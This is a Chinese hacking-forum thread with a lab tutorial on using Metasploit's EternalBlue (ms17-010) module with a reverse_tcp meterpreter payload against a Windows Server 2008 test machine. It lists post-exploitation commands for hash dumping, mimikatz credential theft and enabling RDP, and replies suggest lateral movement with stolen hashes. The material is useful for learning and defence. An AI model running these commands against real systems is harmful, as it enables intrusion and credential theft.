查看: 16732|回复: 4

MSF - 拿下目标服务器最高权限

[复制链接]
发表于 2021-12-23 16:01:09 | 显示全部楼层 |阅读模式

1.        我们准备一台靶机(被攻击机器)   
Windows server 2008 edition 64位(32位靶机系统需要下载对应32位的攻击模块)
2.        我们在准备一台攻击机 kali 2021版本
3.        在靶机里面1.关闭服务器,2.开通445端口,查看靶机ip地址

4.        在攻击机查看ip地址,然后靶机和被攻击机相互ping网络看看通不通,保证网络通不丢包。


5.        开启pg数据库服务 service postgresql start

6.        初始化 msfdb数据库  msfdb init

7.        开启msfconsole

每次开启 logo随机不一样
8.        查看连接数据库状态 db_status

9.        我们知道永恒之蓝漏洞编号ms17-010,我们就搜索一下 search ms17

10.        我们以上面序号0,名称exploit/windows/smb/ms17_010_eternalblue 攻击模块为例子,使用模块指令 use 序号/use 名称。use auxiliary/scanner/smb/smb_ms17_010

或者

11.        然后看一下设置,看看设置需要配置那些信息 options

我们看请求必写的yes对应参数
Rhots 是目前主机,我们设置 set  rhost 192.168.167

Rport 端口 set rport 445
12.        设置payload    set payload windows/x64/meterpreter/reverse_tcp


13.        配置完run

如果跑失败了,指令和配置没有问题就多跑两遍

Fail失败后,ctl+c回到上一级继续run 出现win即可。注意靶机防火墙不能开启负责失败。
14.        简单的指令
查看用户权限: meterpreter> getuid
获取hash密码: meterpreter> hashdump
上传文件: meterpreter> upload 文件名
执行文件: meterpreter> execute -f  notepad.exe
获取屏幕截图:meterpreter>screenshot
获取shell:meterpreter>shell
15.        加载猕猴桃 load mimikatz

Mf6版本使用 wiki指令
16.        使用 creds_all

17.        我们可以开通远程桌面 run post/windows/manage/enable_rdp

18.        登录
  
19.        比如我们执行打开计算器或者记事本
Execute -f calc.txt/notepad.exe




综合框架
Auxiliary         辅助模块          为渗透测试信息搜集提供了大量的辅助模块支持

Exploits        攻击模块          利用发现的安全漏洞或配置弱点对远程目标系统 进行攻击,从而获得对远程目标系统访问权的代码组件。

Payload        攻击载荷模块           攻击成功后促使靶机运行的一段植入代码

Post                后渗透攻击模块  收集更多信息或进一步访问被利用的目标系统

Encoders     编码模块        将攻击载荷进行编码,来绕过防护软件拦截
其他指令
简单好用的帮助指令
help/?               帮助菜单
exit                退出MSF控制台
Back         返回上一级
info                显示一个或者多个模块的信息

show                显示所给类型的模块

background   将当前操作在后台运行

use                 使用所选择的模块
set                设置选项

unset                取消设置的选项
session        会话

回复

使用道具 举报

发表于 2026-5-19 17:45:10 | 显示全部楼层

Re: MSF - 拿下目标服务器最高权限

非常感谢你分享这么详细的教程!步骤清晰,从环境搭建、漏洞利用到后渗透操作都有涵盖,对新手非常友好。特别是提醒了靶机防火墙要关闭、网络要互通这些细节,能少走很多弯路。另外,你列出的MSF框架模块分类和常用指令也很实用,方便快速查阅。学习了!
回复 支持 反对

使用道具 举报

发表于 2026-6-19 09:15:00 | 显示全部楼层

Re: MSF - 拿下目标服务器最高权限

写得非常详细,步骤也很清晰,对新手学习MSF使用永恒之蓝漏洞非常有帮助。特别是把靶机关闭防火墙、多跑几次指令这些经验都分享出来了,很贴心。后面的模块分类和指令总结也能方便查阅。感谢分享!
回复 支持 反对

使用道具 举报

发表于 2026-6-19 12:00:01 | 显示全部楼层

Re: MSF - 拿下目标服务器最高权限

大佬这个教程写得很详细,对于想要入门MSF和永恒之蓝利用的新手来说非常友好。从环境搭建到每一步的指令都列出来了,特别是那个“跑失败就多跑两遍”的提示很实在,实战中确实经常遇到。另外你把辅助模块、攻击载荷、后渗透这些概念都整理了一下,方便理解整个框架。建议后面可以再补充一下如何利用获取到的hash进行横向移动,比如psexec之类的,那样就更完整了。感谢分享!
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

指导单位

江苏省公安厅

江苏省通信管理局

浙江省台州刑侦支队

DEFCON GROUP 86025

Hacking Group 021A

旗下站点

态势感知中心

应急响应中心

红盟安全

联系我们

官方QQ群:112851260

官方邮箱:security#ihonker.org(#改成@)

官方核心成员

关注微信公众号

Archiver|手机版|小黑屋| ( 沪ICP备2021026908号 )

GMT+8, 2026-7-7 07:40 , Processed in 0.039604 second(s), 23 queries , Gzip On, Redis On.

Powered by ihonker.com

Copyright © 2015-现在.

  • 返回顶部